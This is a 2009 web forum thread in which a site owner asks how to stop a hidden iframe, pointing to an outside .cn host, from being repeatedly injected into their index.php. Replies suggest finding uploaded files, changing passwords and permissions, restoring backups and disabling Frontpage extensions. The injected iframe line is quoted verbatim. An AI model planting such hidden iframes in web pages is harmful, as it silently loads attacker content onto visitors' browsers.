Question about iframe attacks

Discussion in 'Security' started by archangel, Jun 30, 2009.

  1. #1
    I have a question.

    somebody is adding this kind of code to one of my sites

    <iframe src="http://namegamestore.cn:8080/index.php" width=164 height=131 style="visibility: hidden"></iframe>

    This has been added to my index.php file.

    I contacted my hosting and they suggested me to change the passwords, wich I did, the problem is I am still having the same situation. Do you have any suggestions?
     
    archangel, Jun 30, 2009 IP
  2. Bohra

    Bohra Prominent Member

    Messages:
    12,573
    Likes Received:
    537
    Best Answers:
    0
    Trophy Points:
    310
    #2
    there must be some file uploaded on ur server by the hacker find it and remove it
     
    Bohra, Jun 30, 2009 IP
  3. powerboss

    powerboss Active Member

    Messages:
    925
    Likes Received:
    32
    Best Answers:
    0
    Trophy Points:
    70
    #3
    In cPanel try not to give access to anonymous ftp and change the folder permissions to 755 and file permissions to 644 and change your ftp password.
     
    powerboss, Jun 30, 2009 IP
  4. willybfriendly

    willybfriendly Peon

    Messages:
    700
    Likes Received:
    17
    Best Answers:
    0
    Trophy Points:
    0
    #4
    You need to figure out how they are getting into your site and plug the hole. Quite likely a vulnerable script of some kind.

    I hope you have a secure backup because once you are hacked there is no telling what all they might have added.
     
    willybfriendly, Jun 30, 2009 IP
  5. awesometbn

    awesometbn Peon

    Messages:
    268
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    0
    #5
    One of my clients was seeing this show up over and over on their website. We contacted the hosting provider and got their help to disable all Frontpage extensions. That helped. But we also changed all passwords and restored files from a clean backup. Honestly I don't even know why Frontpage extension were even an option because we don't do anything with Expression Web or Frontpage. Check your file manager to see if there are any subdirectories like _vti or if there are special settings for Frontpage. If you don't use it either, then make sure it has been removed or disabled.
     
    awesometbn, Jul 12, 2009 IP
  6. theapparatus

    theapparatus Peon

    Messages:
    2,925
    Likes Received:
    119
    Best Answers:
    0
    Trophy Points:
    0
    #6
    theapparatus, Jul 13, 2009 IP